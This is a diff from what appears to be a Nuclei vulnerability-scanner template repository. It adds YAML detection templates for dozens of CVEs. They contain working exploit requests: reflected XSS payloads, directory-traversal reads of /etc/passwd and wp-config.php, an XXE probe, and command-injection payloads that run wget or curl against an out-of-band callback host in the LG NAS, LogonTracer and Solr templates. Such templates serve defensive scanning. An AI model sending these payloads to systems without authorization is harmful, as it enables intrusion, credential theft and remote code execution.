- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

25
cves/2014/CVE-2014-4940.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2014-4940
info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2014/CVE-2014-5368.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

31
cves/2014/CVE-2014-8799.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200

2
cves/2015/CVE-2015-2080.yaml
View File

@ -15,7 +15,7 @@ info:
requests: requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/" - "{{BaseURL}}"
headers: headers:
Referer: \x00 Referer: \x00

31
cves/2015/CVE-2015-2807.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2015/CVE-2015-9414.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

5
cves/2016/CVE-2016-1000128.yaml
View File

@ -4,7 +4,10 @@ info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: |
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin tags: cve,cve2016,wordpress,xss,wp-plugin
requests: requests:

33
cves/2016/CVE-2016-1000139.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2016-1000139
info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain);</script><"'
- 'input type="text" name="ContactId"'
condition: and
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000146.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000146
info:
name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2016/CVE-2016-1000148.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-1000148
info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000149.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000149
info:
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000153.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000155.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2016/CVE-2016-10993.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2016/CVE-2016-2389.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2016-2389
info:
name: SAP xMII 15.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: |
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap
requests:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

24
cves/2017/CVE-2017-12629.yaml
View File

@ -1,26 +1,36 @@
id: CVE-2017-12629 id: CVE-2017-12629
info: info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF name: Apache Solr <= 7.1 XML entity injection
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob tags: cve,cve2017,solr,apache,oob,xxe
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1 - https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests: requests:
- raw: - raw:
- | - |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1 GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1 GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: word - type: word
part: interactsh_protocol # Confirms the DNS Interaction part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- "dns" - "http"
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'

28
cves/2017/CVE-2017-14651.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2017-14651
info:
name: Reflected XSS - WSO2 Data Analytics Server
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
tags: cve,cve2017,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
- "Failed to add new collection"
part: body
condition: and
- type: word
words:
- "text/html"
part: header

40
cves/2017/CVE-2017-18024.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2017-18024
info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
reference: |
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
description: |
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
tags: cve,cve2017,xss,avantfax
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("{{randstr}}")</script>'
- 'AvantFAX'
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

5
cves/2017/CVE-2017-5487.yaml
View File

@ -33,3 +33,8 @@ requests:
- '"name":' - '"name":'
- '"avatar_urls":' - '"avatar_urls":'
condition: and condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'

31
cves/2017/CVE-2017–4011.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-20174011
info:
name: McAfee NDLP User-Agent XSS
author: geeknik
severity: medium
description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
reference:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
tags: cve,cve2017,mcafee,xss
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
- type: word
part: header
words:
- "text/html"

31
cves/2018/CVE-2018-10095.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

42
cves/2018/CVE-2018-10818.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

30
cves/2018/CVE-2018-14013.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-14013
info:
name: Zimbra XSS
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

21
cves/2018/CVE-2018-15517.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
author: gy741
severity: medium
tags: cve,cve2018,dlink,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

27
cves/2018/CVE-2018-15745.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-15745
info:
name: Argus Surveillance DVR - Directory Traversal
author: gy741
severity: high
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
tags: cve,cve2018,argussurveillance,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and

31
cves/2018/CVE-2018-16167.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-16167
info:
name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
reference: |
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
tags: cve,cve2018,logontracer,rce,oob
requests:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

27
cves/2018/CVE-2018-16288.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: |
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2018/CVE-2018-19458.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: |
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2018/CVE-2018-20470.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2018-20470
info:
name: Sahi pro 7.x/8.x - Directory Traversal
author: daffainfo
severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: |
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

2
cves/2018/CVE-2018-3810.yaml
View File

@ -18,7 +18,7 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/" - "{{BaseURL}}"
matchers-condition: and matchers-condition: and
matchers: matchers:

31
cves/2018/CVE-2018-5233.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-5233
info:
name: Grav CMS before 1.3.0 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
tags: cve,cve2018,xss,grav
requests:
- method: GET
path:
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

47
cves/2019/CVE-2019-0193.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2019-0193
info:
name: Apache Solr - DataImportHandler RCE
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
author: pdteam
severity: critical
refrense: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

2
cves/2019/CVE-2019-0221.yaml
View File

@ -7,6 +7,7 @@ info:
reference: reference:
- https://seclists.org/fulldisclosure/2019/May/50 - https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: | description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is, 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
@ -18,6 +19,7 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

29
cves/2019/CVE-2019-12276.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

12
